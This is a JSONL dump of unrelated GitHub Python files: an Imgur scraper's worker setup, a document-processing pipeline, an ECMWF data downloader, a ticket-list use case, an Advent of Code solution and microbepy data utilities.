current_worker_info=current_worker_info,\n            )\n\n            # Batches_ran -= 1\n            # if Batches_ran <= 0:\n            #     # write_last_info()\n            #     Batches_ran = Batches_before_save\n\n            total_iterations += 1\n            # if is_string_used(StringX):\n            #     update_worker_status(\n            #         current_worker_info=current_worker_info,\n            #         message=f\"The String {StringX} was used. Checking next combination.\",\n            #     )\n            #     continue\n\n            while True:\n                if work_queue.full():\n                    time.sleep(1)\n                else:\n                    work_queue.put(StringX)\n                    # string_set.add(StringX)\n                    iterations_this_run -= 1\n                    # check_links(StringX=StringX)\n                    break\n\n            if iterations_this_run == 0:\n                break\n\n        # Wait for all tasks to complete\n        # work_queue.join()\n    except Exception as e:\n        # print(e)\n        write_error_string(error=e)\n        raise Exception\n        # write_error_string(error=e, StringX=StringX)\n\n# class db_updater(StringX = \"\", file_path = \"\", file_size = 0, was_image = False, response_code = 0, message=\"Empty\"):\n\n\nclass db_updater():\n    # TODO Make other workers add things to the db_queue, so this worker can update it.\n    # This is to maybe skip the I/O Errors\n    DB_Handler = DB_handler\n\n    def fetch_last_combination():\n        latest_gen = DB_Handler.fetch_last_combination()\n        return latest_gen\n\n    def loop_worker(current_worker_info):\n        update_worker_status(message=\"Starting to check db_queue for work\", current_worker_info=current_worker_info)\n        while True:\n            work = db_queue.get()\n\n            # StringX=\"\",\n            # response_code=int(0),\n            # was_image=\"\",\n            # file_path=\"\",\n            # file_size=int(0),\n            # message=\"\"\n\n            # StringX=work[\"StringX\"],\n            # response_code=int(work[\"response_code\"]),\n            # was_image=work[\"was_image\"],\n            # file_path=work[\"file_path\"],\n            # file_size=work[\"file_size\"],\n            # message=work[\"message\"]\n\n            \n            update_worker_status(message=f\"Starting to work with {work['work_type']}\", current_worker_info=current_worker_info)\n            if work[\"work_type\"] == \"submit_new_stringX\":\n                kwargs = {}\n                try:\n                    for arg in work.keys():\n                        if arg in work:\n                            kwargs[arg] = work[arg]\n                        else:\n                            kwargs[arg] = None\n\n                    update_worker_status(message=f\"Sending {work['work_type']} to DB_Handler. 
StringX: {work['StringX']}\", current_worker_info=current_worker_info)\n DB_handler.submit_new_stringX(**kwargs)\n \n except Exception as e:\n raise Exception(e)\n # if work[\"work_type\"] == \"submit_new_stringX\":\n\n else:\n raise ValueError(f\"Invalid Work_type: {work['work_type']}\")\n\n# def create_database(settings):\n# if not os.path.isfile(\"file_db.db\"):\n# DB_handler.create_new_database()\n# # Update database with current data:\n# print(\"Creating Database\")\n# for root, dirs, files in os.walk(settings[\"download_folder\"]):\n# for file in files:\n# path = os.path.join(root, file)\n# file_size = os.stat(path).st_size\n# StringX = file.split(\".\")[0]\n \n# DB_handler.submit_new_StringX(StringX = StringX, file_path=path, file_size=file_size, was_image=True, response_code=200)\n# # filename_tuple = tuple(StringX)\n# # file_path = os.path.join(dir, file)\n# # sqlquerry = \"INSERT INTO FILESDB (StringX, file_path, file_size, was_image, message) values(?, ?, ?, ?, ?)\"\n# # con.execute(sqlquerry, (StringX, file, file_size, True, \"\"))\n\n\ndef create_new_worker(work):\n global ErrorLogs\n global current_workers\n global threads_amount\n\n # Create worker:\n current_worker_info = {\n \"Current_Work\": work,\n \"current_message\": \"Birthed\",\n \"WorkerID\": str(uuid.uuid4()),\n }\n\n # print(f\"Creating worker {work}. Info: {current_worker_info}\")\n # Give worker a job:\n if work == \"check_links\":\n \n current_worker_info[\"current_message\"] = \"Got job checking strings!\"\n # Create worker thread:\n t = threading.Thread(target=check_links_start, args=(current_worker_info,))\n\n elif work == \"db_worker\":\n \n current_worker_info[\"current_message\"] = \"Got job working with the SQL DB!\"\n # Create worker thread:\n t = threading.Thread(target=db_updater.loop_worker, args=(current_worker_info,))\n\n elif work == \"create_strings\":\n \n current_worker_info[\"current_message\"] = \"Got job creating links.\"\n # Create worker thread:\n t = threading.Thread(target=create_strings,\n args=(current_worker_info,))\n\n elif work == \"update_terminal\":\n \n current_worker_info[\"current_message\"] = \"Got job updating Terminal.\"\n # Create worker thread:\n t = threading.Thread(target=update_terminal)\n\n elif work == \"fetch_files_number_and_size\":\n \n current_worker_info[\"current_message\"] = \"Got job updating Terminal.\"\n # Create worker thread:\n t = threading.Thread(target=fetch_files_number_and_size)\n else:\n print(f\"Worker got no job! 
Work: {work}\")\n        raise Exception(\"Worker got no job!\")\n\n    # Add worker to list:\n    current_workers[current_worker_info[\"WorkerID\"]] = current_worker_info\n\n    t.daemon = False\n    # current_worker_info[\"current_message\"] = \"Got all my settings!\"\n    t.start()\n\n\n# def write_last_info(mode=\"\"):\n#     global total_iterations\n#     global latest_string_from_File\n\n#     filePath = \"/00LastStringX.txt\" ## TODO Add this to settings file if it is still needed.\n#     if not os.path.isfile(filePath):\n#         with open(settings[\"error_filename\"], \"w+\") as f:\n#             f.write(\"\")\n    \n#     try:\n#         if mode == \"Restore\":\n#             import ast\n\n#             try:\n#                 with open(filePath, \"r+\") as file:\n#                     # latest_string_from_File, total_iterations = tuple(file.read())\n#                     tuple_value = ast.literal_eval(file.read())\n#                     latest_string_from_File, total_iterations = tuple_value\n#                 return\n#             except SyntaxError:\n#                 return\n\n#         except FileNotFoundError:\n#             return\n#     with open(filePath, \"w+\") as file:\n#         tuple = (latest_string, total_iterations)\n#         file.write(str(tuple))\n\n\n# os.system(\"clear\")\n\n# Load last StringX\n# print(\"Loading last info\")\n# write_last_info(mode=\"Restore\")\n\n# Fetching SQL DB\n# SQLDB = sql.connect('file_db.db')\n\n# create_database(settings)\n\n# TODO I really want to make this into a WebUI, but I don't have the time right now...\n\nprint(\"Creating Workers \")\ncreate_new_worker(work=\"update_terminal\")\ncreate_new_worker(work=\"db_worker\")\ncreate_new_worker(work=\"create_strings\")\n# create_new_worker(work=\"fetch_files_number_and_size\") # No need for this after converting to sqlite\nfor i in range(settings[\"max_threads\"]):\n    create_new_worker(work=\"check_links\")\n","repo_name":"Walmann/ImgurScraper","sub_path":"ImgurDownloader.py","file_name":"ImgurDownloader.py","file_ext":"py","file_size_in_byte":30372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13079195568","text":"import os\nimport json\nimport tempfile\nfrom typing import Tuple, Dict\n\nfrom werkzeug.datastructures import FileStorage\n\nfrom doc_resolve import DocFormatValidator, DocPreprocessor, DocTextResolver, MultiDocument\nfrom NER_resolve import TextRecognition\nfrom tools.ExceptionsWithCodes import ClientError, ServerError\n\n\n\ndef handle_multi_doc(doc_file: FileStorage) -> Dict:\n    \"\"\"\n    A single general method for processing a document; its input is the document itself (a multi-page tiff). During processing:\n    text is extracted from it (task 1);\n    graphic objects are extracted (task 2);\n    page texts are classified as first pages and non-first pages (task 3);\n    significant facts are extracted from the first pages (task 4);\n    :param doc_file: uploaded image file with request information\n    :return: json\n    \"\"\"\n\n    \"Task 1\"\n\n    if not DocFormatValidator(doc_file):\n        raise ServerError(\"Failed to validate document format\")\n\n    try:\n        # We have to write to a file, because cv2.imreadmulti reads only from a file, not from a buffer\n        # If this is done inside the with-block, the temp file simply is not processed (img=None); the cause was hard to pin down quickly. 
Possibly a file lock.\n        with tempfile.NamedTemporaryFile(mode='w+b', suffix=\".tiff\", delete=False) as temp_file:\n            buffer = doc_file.stream.read()\n            temp_file.write(buffer)\n\n        multi_doc = MultiDocument(temp_file.name)\n\n        docPreprocessor = DocPreprocessor(multi_doc)\n        preprocessed_multi_doc = docPreprocessor.preprocess()\n\n    except Exception as e:\n        raise e\n    finally:\n        if os.path.exists(temp_file.name):\n            os.remove(temp_file.name)\n\n    doc_text = DocTextResolver(preprocessed_multi_doc)\n    doc_text.reduce_data_with_conf_less_than(40)\n    pages_tokenized = doc_text.process()\n\n    task_1_result_dict = doc_text.to_dict(pages_tokenized)\n\n    \"Task 2 - not implemented\"\n    task_2_result_dict = {}\n\n    \"Task 3 - not implemented\"\n    task_3_result_dict = {\n        \"source\": {\n            \"width\": None,\n            \"height\": None,\n            \"type\": \"other\"\n        }\n    }\n\n    \"Task 4\"\n\n    text_rec = TextRecognition(pages_tokenized)\n    task_4_result_dict = text_rec.to_dict()\n\n    return {\"task_1\": task_1_result_dict,\n            \"task_2\": task_2_result_dict,\n            \"task_3\": task_3_result_dict,\n            \"task_4\": task_4_result_dict}\n","repo_name":"SeptEmver/documents_pipeline","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37439994086","text":"from ecmwfapi import ECMWFService\nimport pandas as pd\n\nserver = ECMWFService(\"mars\")\n \ndate_end = pd.date_range(start='2012-01-01', end='2020-01-01', freq='M')\ndate_start = pd.date_range(start='2012-01-01', end='2019-12-02', freq='MS')\n\nfor x, y in zip(date_start, date_end):\n    date = x.strftime('%Y-%m-%d') +'/to/'+y.strftime('%Y-%m-%d')\n    datestemp = date[14:21]\n    target = 'Ctrl6_%s.nc' % (datestemp)\n    server.execute({\n        \"class\" : \"od\",\n        \"stream\" : \"enfo\",\n        \"expver\" : \"1\",\n        \"type\" : \"cf\",\n        \"levtype\" : \"sfc\",\n        \"time\" : \"00\",\n        \"step\" : \"6\",\n        \"date\" : date,\n        \"param\" : \"228.128\",\n        \"grid\" : \"0.25/0.25\",\n        \"format\" : \"netcdf\",\n        },\n        target)\n\n","repo_name":"evwalz/epc","sub_path":"scripts_download&prepare_data/ecmwf_down.py","file_name":"ecmwf_down.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"18988681717","text":"from tortoise.queryset import QuerySet\n\nfrom common.paginations import PagePagination\nfrom ..entities import BaseAdditionalServiceCase\nfrom ..repos import (\n    AdditionalServiceTicketRepo as TicketRepo,\n    AdditionalServiceTicket as Ticket,\n    AdditionalServiceTemplatetRepo as TemplateRepo,\n    AdditionalServiceTemplate as Template,\n    AdditionalServiceGroupStatusRepo as GroupStatusRepo,\n    AdditionalServiceGroupStatus as GroupStatus,\n)\n\n\nclass TicketListCase(BaseAdditionalServiceCase):\n    \"\"\"\n    Use case for retrieving the list of categories and services\n    \"\"\"\n\n    TEMPLATE_SLUG: str = \"service_list\"\n    CANCELED_TICKET_SLUG: str = \"ticket_canceled\"\n\n    def __init__(\n        self,\n        ticket_repo: type[TicketRepo],\n        template_repo: type[TemplateRepo],\n        group_status_repo: type[GroupStatusRepo],\n    ) -> None:\n        self.ticket_repo: TicketRepo = ticket_repo()\n        self.template_repo: TemplateRepo = template_repo()\n        self.group_status_repo: GroupStatusRepo = group_status_repo()\n\n    async def __call__(\n        self, category_id: int | None, user_id: int, pagination: PagePagination\n    ) -> dict:\n        filters: dict = dict(user_id=user_id)\n        if category_id:\n            filters.update(service__category_id=category_id)\n        qs_options: dict = 
dict(filters=filters)\n count: int = await self.ticket_repo.count(**qs_options)\n qs_options.update(\n related_fields=[\"group_status\", \"service__category\"],\n start=pagination.start,\n end=pagination.end,\n ordering=\"-id\",\n )\n tickets_result_qs: QuerySet = self.ticket_repo.list(**qs_options)\n tickets: list[Ticket] = await tickets_result_qs\n template: Template = await self.template_repo.retrieve(\n filters=dict(slug=self.TEMPLATE_SLUG)\n )\n available_group_statuses: list[GroupStatus] = await self.group_status_repo.list(\n excluded=dict(slug=self.CANCELED_TICKET_SLUG)\n )\n ticket_result: dict = dict(\n count=count,\n result=tickets,\n page_info=pagination(count=count),\n template=template,\n statuses=available_group_statuses,\n )\n return ticket_result\n","repo_name":"r2r2/strana_backend","sub_path":"cabinet/src/additional_services/use_cases/ticket_list.py","file_name":"ticket_list.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38977062868","text":"def reverse(l, start, end):\n '''\n Reverse a section of l from start to start + distance. These values\n don't need to be less than the size of the list; they will be modded by its\n size. Mutates l.\n '''\n section = [l[ i % len(l)] for i in range(start, end)]\n r_section = list(reversed(section))\n for i in range(start, end):\n l[i % len(l)] = r_section[i - start]\n\ndef knot_hash(lengths, index, skip_size, l):\n '''\n Perform the knot hash (mutates l).\n '''\n for length in lengths:\n # Reverse the section from index to index + length.\n reverse(l, index, index + length)\n # These are per the spec.\n index += skip_size + length\n skip_size += 1\n # Return the new index and skip_size to be reused.\n return index, skip_size\n\ndef dense_hash(l):\n '''\n XOR groups of 16 together (len(l) must be a multiple of 16).\n '''\n dh = []\n for i in range(len(l)//16):\n # Reduce by XOR on slices of 16.\n dh.append(functools.reduce(lambda x,y: x^y, l[i*16:(i+1)*16]))\n return dh\n\ndef search(x,y, hashes, visited):\n q = [(x,y)]\n while q:\n x, y= q.pop()\n if (x,y) not in visited:\n visited.add((x,y))\n if hashes[x][y] == '1':\n possibilities = [(0,1), (1,0), (-1,0), (0,-1)]\n for dx, dy in possibilities:\n if 0 <= dx + x < 128 and 0 <= dy + y < 128:\n q.append((x + dx, y + dy))\n return visited\n \n\nwith open('14.in') as inp:\n test = 'flqrgnkx'\n s = 'xlqgujun'\n count = 0\n hashes = []\n for i in range(128):\n lengths = list(map(ord, s + '-' + str(i)))\n lengths += [17, 31, 73, 47, 23]\n l = list(range(256))\n index = skip_size = 0\n for _ in range(64):\n index, skip_size = knot_hash(lengths, index, skip_size, l) \n dh = dense_hash(l)\n b = ''.join(list(map('{0:08b}'.format, dh)))\n count += sum(map(int,b))\n hashes.append(b)\n # print(count)\n visited = set()\n regions = 0\n locations = [(i,j) for i in range(128) for j in range(128)]\n for i,j in locations:\n if (i,j) not in visited and hashes[i][j] != '0':\n visited = search(i, j, hashes, visited)\n regions += 1\n print(regions)\n\n","repo_name":"cole-k/advent-of-code-2017","sub_path":"original/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20095299202","text":"\"\"\"\nUtilities\n\"\"\"\n\nfrom microbepy.common import combination_iterator\nfrom microbepy.common import config\nfrom microbepy.common import constants as cn\nfrom 
microbepy.common.equivalence_class import EquivalenceClass\nfrom microbepy.common import schema\n\nimport collections\nimport math\nimport matplotlib.cm as cm\nimport numpy as np\nimport os\nimport pandas as pd\nfrom sklearn import linear_model\nimport sqlite3 as sql\nimport sys\nimport types\n\nDATA_DIR = \"Data\"\nALT_DATA_DIR = 'data_base' # Directory if project is installed\nREFERENCE_DIR = \"reference\"\nDATA_MODEL_DIR = \"data_model\"\nDATA_DIRECTORIES = set([DATA_DIR, ALT_DATA_DIR])\nGIT_DIR = \".git\"\n\n\nPYTHON_SUBDIRECTORIES = [\n    \"statistics\", \"model\", \"correlation\",\n    \"data\", \"plot\", \"search\", \"common\",\n    ]\nSPECIES = [cn.SPECIES_MIX_DVH, cn.SPECIES_MIX_MMP]\nTOLERANCE = 0.001\nGENE_PREFIXES = ['MMP', 'DVU']\nSMALL_DETERMINANT = 1e-6\nTABLES_GENOTYPE_PHENOTYPE = [\n    cn.TABLE_CULTURE, cn.TABLE_MUTATION, cn.TABLE_ISOLATE,\n    cn.TABLE_CULTURE_ISOLATE_LINK, cn.TABLE_ISOLATE_MUTATION_LINK,\n    cn.TABLE_GENE_DESCRIPTION,\n    ]\n\nVenn = collections.namedtuple('Venn', ['both', 'only1', 'only2'])\n\ndef isNumber(obj):\n  try:\n    _ = float(obj)\n    return True\n  except:\n    return False\n\ndef isStr(obj):\n  \"\"\"\n  :return bool: True if string or unicode\n  \"\"\"\n  type_string = str(type(obj))\n  if 'str' in type_string or 'unicode' in type_string:\n    return True\n  else:\n    return False\n\ndef toNumber(obj):\n  \"\"\"\n  Attempts to convert object to a number.\n  First an int, then a float.\n  If all fail, returns np.nan.\n  \"\"\"\n  for typ in [int, float]:\n    try:\n      val = typ(obj)\n      return val\n    except:\n      pass\n  return np.nan\n  \n\ndef isStr(obj):\n  \"\"\"\n  :return bool: True if string or bytes\n  \"\"\"\n  type_string = str(type(obj))\n  if 'str' in type_string or 'bytes' in type_string:\n    return True\n  else:\n    return False\n\ndef isFloatsEqual(fp1, fp2, tolerance=TOLERANCE):\n  \"\"\"\n  Tests for approximate equality between two floating points.\n  :param float fp1:\n  :param float fp2:\n  :param float tolerance: a positive number less than 1\n  :return bool:\n  \"\"\"\n  if fp2 == 0:\n    if fp1 == 0:\n      return True\n    else:\n      return False\n  return abs((fp1 - fp2)/fp2) < tolerance\n\ndef getPath(path_initial, path_last):\n  \"\"\"\n  Constructs a path from the initial segment and the\n  termination (path_last).\n  :param list-of-str path_initial:\n  :param str/None path_last:\n  :return str:\n  \"\"\"\n  def makeItem(item):\n    \"\"\"\n    Constructs a list containing either just the single item\n    (if it's non-None) or an empty list.\n    :param object item:\n    :return list:\n    \"\"\"\n    if item is None:\n      return []\n    else:\n      return [item]\n\n  path_elements = list(path_initial)\n  addendum = makeItem(path_last)\n  path_elements.extend(addendum)\n  #\n  path = path_elements[0]\n  if len(path_elements) > 1:\n    for ele in path_elements[1:]:\n      path = os.path.join(path, ele)\n  return path\n\ndef getDataModelPath(filename):\n  \"\"\"\n  :return str path: path to data model.\n  :param str filename or None: name of file in sequence data\n      if None, returns the path to the directory\n  \"\"\"\n  if cn.IS_TEST:\n    return cn.TEST_PATH\n  else:\n    try:\n      path = getIdentifiedDirectory(key_directory=GIT_DIR)\n      result = getPath([path, DATA_DIR, DATA_MODEL_DIR],\n          filename)\n    except ValueError:\n      path = getIdentifiedDirectory(key_directory=ALT_DATA_DIR)\n      result = getPath([path, ALT_DATA_DIR], filename)\n  return result\n\ndef getReferenceDataPath(filename):\n  \"\"\"\n  :return str path: path to processed data\n  :param str filename or None: name of file in sequence data\n      if None, returns the path to the directory\n  \"\"\"\n  root_directory = 
getIdentifiedDirectory()\n return getPath([root_directory, DATA_DIR, REFERENCE_DIR],\n filename)\n\ndef getSequenceDataPath(filename):\n \"\"\"\n Provides a path to the sequence data.\n :param str filename or None: name of file\n if None, returns the path to the directory\n \"\"\"\n return getPath([getRootDataDirectory(),\n \"sequence_data\"], filename)\n\ndef getRateYieldDataPath(filename):\n \"\"\"\n Provides a path to the rate-yield data.\n :param str filename or None: name of file\n if None, returns the path to the directory\n \"\"\"\n return getPath([getRootDataDirectory(),\n \"growth_data\", \"rate_yield\"], filename)\n\ndef getODTimeseriesDataPath(filename):\n \"\"\"\n Provides a path to the rate-yield data.\n :param str filename or None: name of file\n if None, returns the path to the directory\n \"\"\"\n return getPath([getRootDataDirectory(),\n \"growth_data\", \"OD_timeseries\"], filename)\n\ndef getGeneNamesFromList(columns):\n \"\"\"\n :param list-of-str columns: list of names, some of which are genes\n :return list-of-str:\n \"\"\"\n names = []\n for pfx in GENE_PREFIXES:\n pfx_len = len(pfx)\n for ele in columns:\n if not isNull(ele):\n if ele[0:pfx_len] == pfx:\n names.append(ele)\n return names\n\ndef isStr(v):\n if isinstance(v, str):\n return True\n if isinstance(v, bytes):\n return True\n\ndef messageConsole(msg):\n print(\"*** %s\" % msg)\n\ndef isNan(v):\n if isinstance(v, float):\n return np.isnan(v)\n else:\n return False\n\ndef isNull(v):\n if isNan(v):\n return True\n singleton_types = [str, int, bytes, type(None)]\n if any([isinstance(v, t) for t in singleton_types]):\n if v is None:\n return True\n if (v == \"None\") or (v == \"none\") or (v == \"nan\"):\n return True\n return False\n\ndef isNanInDataFrame(df, nan_columns=None):\n \"\"\"\n :param pd.DataFrame df:\n :return bool, list-of-str: list of nan columns\n \"\"\"\n if nan_columns is None:\n nan_columns = []\n columns = []\n for col in df.columns.tolist():\n if col in nan_columns:\n continue\n if any([isNan(x) for x in df[col].tolist()]):\n columns.append(col)\n if len(columns) == 0:\n return False, columns\n else:\n return True, columns\n\n\ndef replaceNan(df, columns=None, value=0):\n \"\"\"\n Replaces nan values in specified columns of a dataframe.\n :param pd.DataFramed df:\n :param list-of-str columns: columns to be transformed\n :param object value:\n \"\"\"\n if columns is None:\n columns = df.columns.tolist()\n for column in columns:\n new_values = [value if isNan(x) else x for x in df[column]]\n df[column] = new_values\n \ndef getColorMap(num_colors=20):\n \"\"\"\n :return list-of-color:\n \"\"\"\n # generate data\n N = num_colors\n x = np.random.random(size=N) * 100\n y = np.random.random(size=N) * 100\n radii = np.random.random(size=N) * 1.5\n \n # get a colormap from matplotlib\n colormap =cm.get_cmap(\"gist_rainbow\") #choose any matplotlib colormap here\n \n # define maximum and minimum for cmap\n colorspan=[40,140]\n \n # create a color channel with a value between 0 and 1\n # outside the colorspan the value becomes 0 (left) and 1 (right)\n cmap_input=np.interp(np.sqrt(x*x+y*y),colorspan,[0,1],left=0,right=1)\n \n # use colormap to generate rgb-values\n # second value is alfa (not used)\n # third parameter gives int if True, otherwise float\n A_color=colormap(cmap_input,1,True)\n \n # convert to hex to fit to bokeh\n bokeh_colors = [\"#%02x%02x%02x\" % (r, g, b) for r, g, b in A_color[:,0:3]]\n return bokeh_colors\n\ndef getColumnsFromDataFrame(df, columns):\n \"\"\"\n :return pd.DataFrame: 
has the specified columns\n :raises ValueError: column not present\n \"\"\"\n trues = [c in df.columns.tolist() for c in columns]\n if not all(trues):\n raise ValueError(\"Column not present in DataFrame\")\n return pd.DataFrame(df[columns])\n\ndef changeColumnValues(df, func):\n \"\"\"\n Change values in the columns.\n :param DataFrame df:\n :param Function func:\n Inputs: column (str), value (float)\n Output: float\n \"\"\"\n for col in df.columns:\n values = df[col].tolist()\n new_values = [func(col, v) for v in values]\n df[col] = new_values\n\ndef setNoneList(values):\n \"\"\"\n :param list/None values:\n :return list\n \"\"\"\n if values is None:\n return []\n else:\n return values\n\ndef getColumnType(column):\n \"\"\"\n Finds the type for a column\n :param str column:\n :return type:\n \"\"\"\n for column_schema in cn.TABLE_SCHEMAS.column_schemas.getSchemas():\n if column == column_schema.name:\n return column_schema.data_type\n raise RuntimeError(\"Column %s is not typed\" % column)\n\ndef cleanDF(df, is_reset_index=False):\n \"\"\"\n Removes duplicates and stray columns.\n Removes all columns of the form \"index_\".\n :param pd.DataFrame df:\n \"\"\"\n df.drop_duplicates(inplace=True)\n df = pruneNullRows(df)\n if is_reset_index:\n resetIndex(df)\n remove_column = \"%s_\" % cn.INDEX\n for column in df.columns:\n if (column.find(remove_column) == 0) \\\n or (column == cn.INDEX):\n del df[column]\n return df\n\ndef resetIndex(df):\n \"\"\"\n Resets the index handling stray columns.\n :param pd.DataFrame df:\n \"\"\"\n LEVEL_0 = 'level_0'\n columns = df.columns\n if LEVEL_0 in columns:\n del df[LEVEL_0]\n df.reset_index(inplace=True)\n if LEVEL_0 in columns:\n del df[LEVEL_0]\n\ndef standardize(df, columns=None):\n \"\"\"\n Standardizes a numeric column in a dataframe.\n :param pd.DataFrame df:\n :param list-of-str columns\n \"\"\"\n if columns is None:\n columns = df.columns\n for column in columns:\n std = np.std(df[column])\n avg = np.mean(df[column])\n if np.isclose(std, 0):\n df[column] = 0\n else:\n df[column] = (df[column] - avg)/std\n\ndef deleteColumns(df, columns, is_drop_duplicates=True):\n \"\"\"\n Deletes columns from the DataFrame, if they are present.\n :param pd.DataFrame df:\n :param list-of-str columns:\n :param bool is_drop_duplicates:\n \"\"\"\n for column in columns:\n if column in df.columns:\n del df[column]\n if is_drop_duplicates:\n df.drop_duplicates(inplace=True)\n\ndef trimDF(df, keep_columns=None, delete_columns=None):\n \"\"\"\n Keeps/deletes columns in a dataframe.\n Exactly one of keep_columns/delete_columns can be non-None.\n :param pd.DataFrame df:\n :param list-of-str keep_columns: Columns to keep\n :param list-of-str delete_columns: Columns to delete\n :return pd.DataFrame:\n \"\"\"\n if keep_columns is None and delete_columns is None:\n raise ValueError(\"Invalid parameters.\")\n if not keep_columns is None and not delete_columns is None:\n raise ValueError(\"Invalid parameters.\")\n if keep_columns is not None:\n df_result = df[keep_columns].copy(deep=True)\n if delete_columns is not None:\n df_result = df.copy(deep=True)\n deleteColumns(df_result, delete_columns, is_drop_duplicates=True)\n df_result.drop_duplicates(inplace=True)\n return df_result\n\ndef makeNullRow(df, null=np.nan):\n \"\"\"\n Creates a row of null values to the dataframe.\n :param object null: value in row\n :return dict: row\n \"\"\"\n row = {}\n for column in df.columns.tolist():\n row[column] = null\n return row\n\ndef addNullRow(df, null=np.nan):\n \"\"\"\n Adds a row of 
null values to the dataframe.\n  :param object null: value in row\n  :return pd.DataFrame:\n  \"\"\"\n  return df.append(makeNullRow(df), ignore_index=True)\n\ndef getDBPath():\n  \"\"\"\n  The correct choice of a path depends on the runtime environment:\n  1. Running with .microbepy/config.yml in the home\n     directory (includes case of being installed)\n       SQLDB_PATH: \n  2. Running within the microbepy project: \n       microbepy/Data/data_model/synthetic.db\n  3. Running as a subproject:\n       /Data/data_model/microbepy.db\n  :return str:\n  :raises KeyError: configuration file exists but no DB path\n  :raises ValueError: cannot find .git file for project root\n  \"\"\"\n  try:\n    path = config.get(key=cn.SQLDB_PATH_NAME)\n  except KeyError:\n    path = None\n  if path is None:\n    try:\n      gitbase_path = getIdentifiedDirectory(key_directory=GIT_DIR)\n    except:\n      raise ValueError(\"Cannot find project directory.\")\n    path = getPath([gitbase_path, \"Data\", \"data_model\"], \n        cn.SYNTHETIC_DB)\n  return path\n\ndef getDBConnection(path=None):\n  if path is None:\n    path = getDBPath()\n  try:\n    conn = sql.connect(path)\n  except:\n    raise ValueError(\"Invalid path to DB: %s\" % path)\n  return conn\n\ndef getDuplicates(values):\n  \"\"\"\n  :param list-of-object values:\n  :return list-of-object:\n  \"\"\"\n  result = list(values)\n  [result.remove(x) for x in set(values)]\n  return result\n\ndef typeDF(df, columns=None):\n  \"\"\"\n  Ensures that column values are of the correct type.\n  :param list-of-str columns:\n  :return pd.DataFrame:\n  \"\"\"\n  if columns is None:\n    columns = list(df.columns)\n  for column in columns:\n    typ = getColumnType(column)\n    values = df[column]\n    df[column] = [np.nan if isNull(v) else typ(v) for v in values]\n  return df\n\ndef removeDuplicateColumns(df):\n  \"\"\"\n  Removes columns that have a duplicate name.\n  :return pd.DataFrame:\n  \"\"\"\n  duplicates = getDuplicates(df.columns)\n  done = False\n  idx = 0\n  df_result = df.copy()\n  additions_dict = {}\n  while not done:\n    if idx >= len(df_result.columns):\n      done = True\n      break\n    column = df_result.columns[idx]\n    if column in duplicates:\n      df1 = df_result[column]\n      values = df1.iloc[:,1]\n      del df_result[column]\n      duplicates.remove(column)\n      additions_dict[column] = values\n    else:\n      idx += 1\n  df_add = pd.DataFrame(additions_dict)\n  df_result = pd.concat([df_result, df_add], axis=1, sort=True)\n  return df_result\n\ndef makeVenn(group1, group2):\n  \"\"\"\n  Constructs the Venn regions for two groups:\n    both - overlap between the groups\n    only1 - only in group 1\n    only2 - only in group 2\n  :param list-of-object group1:\n  :param list-of-object group2:\n  :return Venn:\n  \"\"\"\n  set1 = set(group1)\n  set2 = set(group2)\n  return Venn(\n      both=set1.intersection(set2),\n      only1=set1.difference(set2),\n      only2=set2.difference(set1),\n      )\n\ndef selNonNull(values1, values2):\n  \"\"\"\n  Selects the non-null value of the two lists in its position.\n  :param list-of-object values1:\n  :param list-of-object values2:\n  :return list-of-object result:\n  \"\"\"\n  if len(values1) != len(values2):\n    raise ValueError(\"Inputs must have the same length.\")\n  pairs = zip(values1, values2)\n  result = []\n  for x,y in pairs:\n    if x == y:\n      result.append(x)\n    elif isNull(x):\n      result.append(y)\n    elif isNull(y):\n      result.append(x)\n    else:\n      msg = \"Inputs must be identical if in the same position and non-null.\"\n      raise ValueError(msg)\n  return result\n  \ndef mergeRowsColumns(df1, df2, merge_column):\n  \"\"\"\n  Merges the two dataframes, combining both rows and columns.\n  Column values are appended where the 
dataframes have the same columns.\n nan values are added to columns where the column is not present\n in a dataframe.\n :param pd.DataFrame df1:\n :param pd.DataFrame df2:\n :param str merge_column: column on which the merge is done\n :return pd.DataFrame: Has columns df1.columns + df2.columns\n \"\"\"\n LEFT = \"__left\"\n RIGHT = \"__right\"\n df_1 = removeDuplicateColumns(df1)\n cleanDF(df_1)\n df_2 = removeDuplicateColumns(df2)\n cleanDF(df_2)\n df_result = df_1.merge(df_2, on=merge_column, how='outer',\n suffixes=(LEFT, RIGHT))\n # Merge the overlapping columns\n left_overlaps = [c for c in df_result.columns\n if c[-len(LEFT):] == LEFT]\n left_overlaps.sort()\n right_overlaps = [c for c in df_result.columns\n if c[-len(RIGHT):] == RIGHT]\n right_overlaps.sort()\n pairs = zip(left_overlaps, right_overlaps)\n for left, right in pairs:\n values = selNonNull(df_result[left], df_result[right])\n pos = left.find(LEFT)\n column = left[0:pos]\n del df_result[left]\n del df_result[right]\n df_result[column] = values\n # Finalize result\n cleanDF(df_result)\n return df_result\n\ndef readSQL(cmd, path=None):\n \"\"\"\n Creates a dataframe for the SQL query.\n 1. Duplicate column names (ending with ':n') are merged.\n 2. Deletes columns that begin with 'index'\n 3. None values have a consistent representation\n :param str/TableSchema cmd: SQL query command or TableSchema,\n if want the entire table\n :param str path: path to database\n :return pd.DataFrame:\n \"\"\"\n SEP = \":\"\n if isinstance(cmd, schema.TableSchema):\n sql_cmd = \"SELECT * FROM %s\" % cmd.name\n else:\n sql_cmd = cmd\n conn = getDBConnection(path=path)\n df_result = pd.read_sql(sql_cmd, conn)\n conn.close()\n done = False\n while not done:\n duplicates = [c for c in df_result.columns if c.count(SEP) > 0]\n if len(duplicates) == 0:\n done = True\n break\n column = duplicates[0]\n pos = column.find(SEP)\n column = column[:pos]\n columns = [c for c in df_result.columns if c.count(column) > 0]\n # Delete index columns\n if column in ['level_0', cn.INDEX]:\n for col in columns:\n del df_result[col]\n # Merge other columns\n else:\n col_first = columns[0]\n values = df_result[col_first].tolist()\n del df_result[col_first]\n columns = columns[1:]\n for col in columns:\n try:\n values = selNonNull(values, df_result[col].tolist())\n except:\n 